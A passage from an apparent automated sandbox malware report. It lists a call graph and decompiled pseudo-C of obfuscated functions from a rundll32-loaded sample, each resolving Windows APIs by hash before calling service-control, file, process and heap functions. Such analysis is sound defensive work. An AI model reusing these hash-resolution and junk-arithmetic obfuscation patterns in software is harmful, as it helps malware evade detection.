38453f GetPEB 4932->4934 4933 3747ce GetPEB 4933->4934 4934->4918 4934->4919 4934->4920 4934->4921 4934->4923 4934->4924 4934->4925 4934->4927 4934->4928 4934->4929 4934->4931 4934->4932 4934->4933 4935 37a8b0 GetPEB 4934->4935 4936 37ea99 3 API calls 4934->4936 5046 38dedc 4934->5046 5052 388727 4934->5052 4935->4934 4936->4934 4947 37f696 4937->4947 4938 3846bb 2 API calls 4938->4947 4939 37f88f 4939->4271 4940 38da22 GetPEB 4940->4947 4941 37b6cf GetPEB 4941->4947 4942 378969 GetPEB 4942->4947 4943 37a8b0 GetPEB 4943->4947 4944 38dcf7 RtlAllocateHeap GetPEB 4944->4947 4945 37ab87 3 API calls 4945->4947 4946 3747ce GetPEB 4946->4947 4947->4938 4947->4939 4947->4940 4947->4941 4947->4942 4947->4943 4947->4944 4947->4945 4947->4946 4948 37ea99 3 API calls 4947->4948 4948->4947 4950 379a55 4949->4950 4951 379b65 4950->4951 4955 379b63 4950->4955 5056 3746be 4950->5056 5060 38c3a0 4950->5060 5068 377c37 4950->5068 4953 389e56 GetPEB 4951->4953 4953->4955 4955->4271 4963 381c8c 4957->4963 4958 37ab87 3 API calls 4958->4963 4959 38da22 GetPEB 4959->4963 4960 381dd2 4960->4271 4961 37b6cf GetPEB 4961->4963 4962 378969 GetPEB 4962->4963 4963->4958 4963->4959 4963->4960 4963->4961 4963->4962 4964 38dcf7 2 API calls 4963->4964 4965 3747ce GetPEB 4963->4965 4966 37a8b0 GetPEB 4963->4966 4967 37ea99 3 API calls 4963->4967 4964->4963 4965->4963 4966->4963 4967->4963 4974 37ba53 4968->4974 4969 37bb5e 4969->4271 4970 38c3a0 GetPEB 4970->4974 4971 37bb60 4972 389e56 GetPEB 4971->4972 4972->4969 4973 3746be GetPEB 4973->4974 4974->4969 4974->4970 4974->4971 4974->4973 4975 377c37 GetPEB 4974->4975 4975->4974 4977 389e69 4976->4977 4980 376bf2 4977->4980 4981 376c0c 4980->4981 4982 38aa30 GetPEB 4981->4982 4983 376c8f 4982->4983 4983->4881 4985 37b6e5 4984->4985 4986 38aa30 GetPEB 4985->4986 4987 37b742 4986->4987 4987->4888 4989 378980 4988->4989 4990 38d25e GetPEB 4989->4990 4991 378a5d 4990->4991 4991->4888 4997 37eab9 4992->4997 4993 37ecec 4993->4888 4994 378f65 2 API calls 4994->4997 4995 37ecd6 4998 381e67 2 API calls 4995->4998 4997->4993 4997->4994 4997->4995 4999 3719b8 4997->4999 4998->4993 5000 3719dd 4999->5000 5001 38aa30 GetPEB 5000->5001 5002 371a3f 5001->5002 5002->4997 5007 38bb48 5003->5007 5004 381e67 2 API calls 5004->5007 5006 38be1d 5006->4911 5007->5004 5007->5006 5009 373de2 GetPEB 5007->5009 5023 390ac8 5007->5023 5027 38d8ec 5007->5027 5009->5007 5011 38aa30 GetPEB 5010->5011 5012 373e36 5011->5012 5012->4911 5020 38d3c3 5013->5020 5015 38d82d 5039 389008 5015->5039 5017 38d82b 5017->4911 5018 374b61 GetPEB 5018->5020 5019 38dcf7 2 API calls 5019->5020 5020->5015 5020->5017 5020->5018 5020->5019 5022 37a8b0 GetPEB 5020->5022 5031 38de10 5020->5031 5035 374241 5020->5035 5022->5020 5024 390af2 5023->5024 5025 38aa30 GetPEB 5024->5025 5026 390b4e 5025->5026 5026->5007 5028 38d8ff 5027->5028 5029 38aa30 GetPEB 5028->5029 5030 38d96e 5029->5030 5030->5007 5032 38de56 5031->5032 5033 38aa30 GetPEB 5032->5033 5034 38deba 5033->5034 5034->5020 5036 374257 5035->5036 5037 38aa30 GetPEB 5036->5037 5038 3742b3 5037->5038 5038->5020 5040 38901a 5039->5040 5041 38aa30 GetPEB 5040->5041 5042 389074 5041->5042 5042->5017 5044 38aa30 GetPEB 5043->5044 5045 387d3e 5044->5045 5045->4934 5049 38df09 5046->5049 5047 38e1a5 5050 390e3a GetPEB 5047->5050 5048 38e1a3 5048->4934 5049->5047 5049->5048 5051 377ff2 2 API calls 5049->5051 5050->5048 5051->5049 5053 388758 5052->5053 5054 38aa30 GetPEB 5053->5054 5055 3887b7 5054->5055 5055->4934 5057 3746e5 5056->5057 5058 38aa30 GetPEB 5057->5058 5059 374737 5058->5059 5059->4950 5061 38c3bc 5060->5061 5062 38c627 5061->5062 5073 37a3a3 5061->5073 5062->4950 5065 37ed7e GetPEB 5066 38c5e2 5065->5066 5066->5062 5067 37ed7e GetPEB 5066->5067 5067->5066 5071 377c52 5068->5071 5069 377df1 5069->4950 5070 38cadf GetPEB 5070->5071 5071->5069 5071->5070 5077 376ca0 5071->5077 5074 37a3c0 5073->5074 5075 38aa30 GetPEB 5074->5075 5076 37a41a 5075->5076 5076->5062 5076->5065 5078 376cb8 5077->5078 5079 38aa30 GetPEB 5078->5079 5080 376d15 5079->5080 5080->5071 5082 37a9e6 5081->5082 5083 38aa30 GetPEB 5082->5083 5084 37aa3f 5083->5084 5084->4287 5086 378ee7 5085->5086 5087 38aa30 GetPEB 5086->5087 5088 378f54 5087->5088 5088->4287 5092 37435e 5089->5092 5090 377ff2 2 API calls 5090->5092 5091 37ae64 GetPEB 5091->5092 5092->5090 5092->5091 5093 37457c 5092->5093 5094 3745a6 5092->5094 5100 37ae64 5093->5100 5094->4287 5097 374e8f 5096->5097 5098 38aa30 GetPEB 5097->5098 5099 374ed7 5098->5099 5099->4287 5101 37ae8b 5100->5101 5102 38aa30 GetPEB 5101->5102 5103 37aee2 5102->5103 5103->5094 5108 38001b 5104->5108 5105 388606 2 API calls 5105->5108 5108->5105 5109 38031b 5108->5109 5111 37a8b0 GetPEB 5108->5111 5112 37cd29 5108->5112 5116 37ee81 5108->5116 5121 372206 5108->5121 5109->4291 5111->5108 5113 37cd3f 5112->5113 5114 38aa30 GetPEB 5113->5114 5115 37cd9f 5114->5115 5115->5108 5125 388f15 5116->5125 5118 37eff7 5118->5108 5122 37222a 5121->5122 5123 37a42d GetPEB 5122->5123 5124 372249 5123->5124 5124->5108 5126 388f34 5125->5126 5127 38aa30 GetPEB 5126->5127 5128 37efa8 5127->5128 5128->5118 5129 38db43 5128->5129 5130 38db6c 5129->5130 5131 38aa30 GetPEB 5130->5131 5132 38dbd4 5131->5132 5132->5118 5134 377b13 5133->5134 5135 38aa30 GetPEB 5134->5135 5136 377b7c 5135->5136 5136->4300 5138 388b6f 5137->5138 5139 38aa30 GetPEB 5138->5139 5140 388bd5 5139->5140 5140->4132 5144 379df5 5141->5144 5143 37a305 5143->4322 5144->5143 5146 38dcf7 RtlAllocateHeap GetPEB 5144->5146 5147 37a918 GetPEB 5144->5147 5149 3747ce GetPEB 5144->5149 5150 37a8b0 GetPEB 5144->5150 5151 379dcf 2 API calls 5144->5151 5152 374635 5144->5152 5156 377e00 5144->5156 5160 378abf 5144->5160 5146->5144 5147->5144 5149->5144 5150->5144 5151->5144 5153 37464b 5152->5153 5154 38aa30 GetPEB 5153->5154 5155 3746b0 5154->5155 5155->5144 5157 377e18 5156->5157 5158 38aa30 GetPEB 5157->5158 5159 377e79 5158->5159 5159->5144 5161 378ad1 5160->5161 5162 38aa30 GetPEB 5161->5162 5163 378b32 5162->5163 5163->5144 5175 37e2cc 5164->5175 5168 379ba6 5167->5168 5198 3791dd 5168->5198 5173 381e67 2 API calls 5174 379d26 5173->5174 5174->4331 5183 37e2f1 5175->5183 5179 37e4ef 5182 381e67 2 API calls 5179->5182 5181 375357 5181->4331 5182->5181 5183->5179 5183->5181 5184 375988 5183->5184 5187 378e4d 5183->5187 5190 38c15d 5183->5190 5194 372a58 5183->5194 5185 38aa30 GetPEB 5184->5185 5186 3759db 5185->5186 5186->5183 5188 385c73 GetPEB 5187->5188 5189 378eb3 5188->5189 5189->5183 5191 38c176 5190->5191 5192 38aa30 GetPEB 5191->5192 5193 38c1de 5192->5193 5193->5183 5195 372a71 5194->5195 5196 38aa30 GetPEB 5195->5196 5197 372ad6 5196->5197 5197->5183 5199 38aa30 GetPEB 5198->5199 5200 37923b 5199->5200 5200->5174 5201 3776aa 5200->5201 5202 3776cd 5201->5202 5203 38aa30 GetPEB 5202->5203 5204 377723 5203->5204 5204->5173 5206 38e365 5205->5206 5207 37a42d GetPEB 5206->5207 5208 38e38d 5207->5208 5208->4341 5211 37410d 5209->5211 5212 37421e 5211->5212 5213 38dcf7 2 API calls 5211->5213 5215 37aad6 GetPEB 5211->5215 5216 37421c 5211->5216 5217 37a8b0 GetPEB 5211->5217 5229 371f53 5211->5229 5214 371fd1 GetPEB 5212->5214 5213->5211 5214->5216 5215->5211 5216->4364 5217->5211 5219 386c65 5218->5219 5220 374b61 GetPEB 5219->5220 5221 386d92 5219->5221 5223 386db0 5219->5223 5237 379d31 5219->5237 5220->5219 5233 386637 5221->5233 5223->4364 5226 37b1db 5225->5226 5227 38aa30 GetPEB 5226->5227 5228 37b231 5227->5228 5228->4353 5230 371f6f 5229->5230 5231 38aa30 GetPEB 5230->5231 5232 371fc3 5231->5232 5232->5211 5234 386659 5233->5234 5235 38aa30 GetPEB 5234->5235 5236 3866b7 5235->5236 5236->5223 5238 379d52 5237->5238 5239 38aa30 GetPEB 5238->5239 5240 379dc1 5239->5240 5240->5219 5279 374c5d 5280 374d8d 5279->5280 5281 388606 2 API calls 5280->5281 5286 374dd2 5280->5286 5282 374da8 5281->5282 5287 37cbdf 5282->5287 5285 37a8b0 GetPEB 5285->5286 5288 37cbfb 5287->5288 5289 374dbc 5288->5289 5291 384011 5288->5291 5289->5285 5292 384026 5291->5292 5293 38aa30 GetPEB 5292->5293 5294 384078 5293->5294 5294->5288 5295 380a96 5297 380aa6 5295->5297 5298 384087 GetPEB 5295->5298 5298->5297

                                                                                                                      Executed Functions

                                                                                                                      Function 0037912C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 37912c-3791af call 3820b9 call 38aa30 OpenSCManagerW
                                                                                                                      C-Code - Quality: 54%
                                                                                                                      			E0037912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t32;
				signed int _t34;
				int _t43;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t43 = __ecx;
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E003820B9(_t24);
				_v12 = 0x4657ea;
				_t34 = 0x1b;
				_v12 = _v12 / _t34;
				_v12 = _v12 ^ 0x000ac4f3;
				_v8 = 0xb5c996;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x19;
				_v8 = _v8 + 0x3329;
				_v8 = _v8 ^ 0x01161fa0;
				E0038AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
				_t32 = OpenSCManagerW(0, 0, _t43); // executed
				return _t32;
			}









                                                                                                                      0x0037912f
                                                                                                                      0x00379130
                                                                                                                      0x00379133
                                                                                                                      0x00379138
                                                                                                                      0x0037913a
                                                                                                                      0x0037913d
                                                                                                                      0x0037913e
                                                                                                                      0x00379141
                                                                                                                      0x00379143
                                                                                                                      0x00379144
                                                                                                                      0x00379149
                                                                                                                      0x0037915a
                                                                                                                      0x00379162
                                                                                                                      0x0037916a
                                                                                                                      0x00379171
                                                                                                                      0x00379178
                                                                                                                      0x00379186
                                                                                                                      0x00379189
                                                                                                                      0x00379190
                                                                                                                      0x0037919d
                                                                                                                      0x003791a8
                                                                                                                      0x003791af

                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 003791A8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ManagerOpen
                                                                                                                      • String ID: WF
                                                                                                                      • API String ID: 1889721586-2390014890
                                                                                                                      • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                      • Instruction ID: 437d72c7bcf249edf535265df31f9fbf7eb2bffd28cb1e74599ec71f23f504ee
                                                                                                                      • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                      • Instruction Fuzzy Hash: 27016971901208FBEB09DB95DD4ACAFBFB8EBC5714F108099F404A7200D3B55F109BA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003742C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39serviceCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 255 3742c4-374345 call 3820b9 call 38aa30 OpenServiceW
                                                                                                                      C-Code - Quality: 48%
                                                                                                                      			E003742C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t34 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t24);
				_v8 = 0x971c9e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xbdaa;
				_v8 = _v8 | 0x44f2c0c3;
				_v8 = _v8 ^ 0x44fb9439;
				_v12 = 0x762558;
				_v12 = _v12 | 0xdc63e739;
				_v12 = _v12 ^ 0xdc7b8d87;
				E0038AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
				return _t29;
			}








                                                                                                                      0x003742c7
                                                                                                                      0x003742c8
                                                                                                                      0x003742ca
                                                                                                                      0x003742cd
                                                                                                                      0x003742cf
                                                                                                                      0x003742d2
                                                                                                                      0x003742d5
                                                                                                                      0x003742d8
                                                                                                                      0x003742db
                                                                                                                      0x003742dc
                                                                                                                      0x003742dd
                                                                                                                      0x003742e2
                                                                                                                      0x003742ec
                                                                                                                      0x003742f5
                                                                                                                      0x003742fc
                                                                                                                      0x00374303
                                                                                                                      0x0037430a
                                                                                                                      0x00374311
                                                                                                                      0x00374318
                                                                                                                      0x00374330
                                                                                                                      0x0037433f
                                                                                                                      0x00374345

                                                                                                                      APIs
                                                                                                                      • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00384A8F,?,?,2635DC09), ref: 0037433F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenService
                                                                                                                      • String ID: X%v
                                                                                                                      • API String ID: 3098006287-3430654708
                                                                                                                      • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                      • Instruction ID: 6c46207559fe28baa97599cef596c3f07856948e3ad7111aaea0ffde47a6c397
                                                                                                                      • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                      • Instruction Fuzzy Hash: A30104B281120CFBDF16DFD4D9468DEBF79EB14314F148189F90566221D2729B609B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00378F65 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 260 378f65-379010 call 3820b9 call 38aa30 CreateFileW
                                                                                                                      C-Code - Quality: 35%
                                                                                                                      			E00378F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t38;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t32);
				_v28 = 0xee6fdc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x957ab3;
				_v12 = _v12 ^ 0x02d9a910;
				_v12 = _v12 + 0xffff8488;
				_v12 = _v12 ^ 0x02485b8e;
				_v8 = 0xf6b813;
				_v8 = _v8 + 0xffff9c70;
				_v8 = _v8 + 0xffff858c;
				_v8 = _v8 ^ 0x00f72129;
				E0038AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
				return _t38;
			}









                                                                                                                      0x00378f6d
                                                                                                                      0x00378f72
                                                                                                                      0x00378f73
                                                                                                                      0x00378f76
                                                                                                                      0x00378f79
                                                                                                                      0x00378f7c
                                                                                                                      0x00378f7f
                                                                                                                      0x00378f80
                                                                                                                      0x00378f83
                                                                                                                      0x00378f86
                                                                                                                      0x00378f8a
                                                                                                                      0x00378f8b
                                                                                                                      0x00378f90
                                                                                                                      0x00378f9f
                                                                                                                      0x00378faa
                                                                                                                      0x00378fb1
                                                                                                                      0x00378fb2
                                                                                                                      0x00378fb9
                                                                                                                      0x00378fc0
                                                                                                                      0x00378fc7
                                                                                                                      0x00378fce
                                                                                                                      0x00378fd5
                                                                                                                      0x00378fdc
                                                                                                                      0x00378fe3
                                                                                                                      0x00378ff0
                                                                                                                      0x00379009
                                                                                                                      0x00379010

                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00379009
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                      • Instruction ID: 4ef644c63cb17270f9f96c97e70e737ff4730c415eded2b7f7e7ff7dfd550d8d
                                                                                                                      • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                      • Instruction Fuzzy Hash: AD112B72900219FBCF229FE5DD098DFBFB5EF58354F118189F90862121C3328A61EB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00377F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 265 377f5d-377ff1 call 3820b9 call 38aa30 CreateProcessW
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0037AD99,?,?,?,181C8C04,0037AD99), ref: 00377FEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction ID: 0e077f6d55c0fc79e9b05ece8147445b89fe0ba675fe17c1794b1ecc8317ded7
                                                                                                                      • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction Fuzzy Hash: E011D672402118BBDF62AFD1DD09CDF7F79EF093A4F145144F91925121D2768A60EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00374DDD Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 270 374ddd-374e73 call 3820b9 call 38aa30 SHFileOperationW
                                                                                                                      C-Code - Quality: 16%
                                                                                                                      			E00374DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				int _t38;
				signed int _t40;
				signed int _t44;
				struct _SHFILEOPSTRUCTW* _t45;

				_push(_a12);
				_t45 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003820B9(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x8324bd;
				_v20 = 0xe59c0f;
				_v12 = 0xfa6a5a;
				_v12 = _v12 | 0x6fcfbea7;
				_t40 = 0x1a;
				_push(0x3771311d);
				_push(_t40);
				_v12 = _v12 * 0x42;
				_v12 = _v12 ^ 0xdff430a4;
				_v8 = 0x460bc4;
				_v8 = _v8 | 0x3946640e;
				_push(0xdf0d4f1a);
				_v8 = _v8 / _t40;
				_v8 = _v8 + 0x2a2;
				_v8 = _v8 ^ 0x023f16a4;
				_t44 = 0x58;
				E0038AA30(_t44);
				_t38 = SHFileOperationW(_t45); // executed
				return _t38;
			}













                                                                                                                      0x00374de4
                                                                                                                      0x00374de7
                                                                                                                      0x00374de9
                                                                                                                      0x00374dec
                                                                                                                      0x00374def
                                                                                                                      0x00374df1
                                                                                                                      0x00374df6
                                                                                                                      0x00374dfd
                                                                                                                      0x00374e06
                                                                                                                      0x00374e0d
                                                                                                                      0x00374e14
                                                                                                                      0x00374e21
                                                                                                                      0x00374e22
                                                                                                                      0x00374e27
                                                                                                                      0x00374e28
                                                                                                                      0x00374e2b
                                                                                                                      0x00374e32
                                                                                                                      0x00374e39
                                                                                                                      0x00374e45
                                                                                                                      0x00374e4a
                                                                                                                      0x00374e4d
                                                                                                                      0x00374e54
                                                                                                                      0x00374e63
                                                                                                                      0x00374e64
                                                                                                                      0x00374e6d
                                                                                                                      0x00374e73

                                                                                                                      APIs
                                                                                                                      • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00374E6D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileOperation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3080627654-0
                                                                                                                      • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                      • Instruction ID: cf16629af539a33616f49a21373d06cf94cb9efecc183c86d9babfdf080eddca
                                                                                                                      • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                      • Instruction Fuzzy Hash: C10139B5E01209FBDB14EFA4D9469DEBFB4EF80318F10C089E904AA251D3744B549B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00375DDD Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00375DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_t34 = __ecx;
				E003820B9(_t21);
				_v12 = 0x9fac18;
				_v12 = _v12 ^ 0x90454497;
				_v12 = _v12 ^ 0x90d3245f;
				_v8 = 0x647eb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xffff0b9f;
				_v8 = _v8 ^ 0xfff54d3d;
				_t25 = E0038AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
				return _t26;
			}












                                                                                                                      0x00375de9
                                                                                                                      0x00375deb
                                                                                                                      0x00375dfa
                                                                                                                      0x00375dff
                                                                                                                      0x00375e09
                                                                                                                      0x00375e15
                                                                                                                      0x00375e1c
                                                                                                                      0x00375e23
                                                                                                                      0x00375e27
                                                                                                                      0x00375e2b
                                                                                                                      0x00375e32
                                                                                                                      0x00375e4a
                                                                                                                      0x00375e58
                                                                                                                      0x00375e5f

                                                                                                                      APIs
                                                                                                                      • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00375E58
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleInformation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3935143524-0
                                                                                                                      • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                      • Instruction ID: 9e4cb6cc1c812524f59df03c18050d80ee30f982738ed4ed13abd5011f3902e9
                                                                                                                      • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                      • Instruction Fuzzy Hash: 5001BC76901308BBDB24DED0CC0AEEEBF74EF95314F108089F50466250D3B05B109BA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00371E22 Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 371e22-371ea6 call 3820b9 call 38aa30 RtlAllocateHeap
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00371E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t42;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t42 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t27);
				_v12 = 0x309d17;
				_v12 = _v12 | 0x1b560655;
				_v12 = _v12 ^ 0x1b78328a;
				_v8 = 0xa187d;
				_v8 = _v8 + 0xa972;
				_t36 = 0x67;
				_v8 = _v8 / _t36;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x000b519a;
				E0038AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
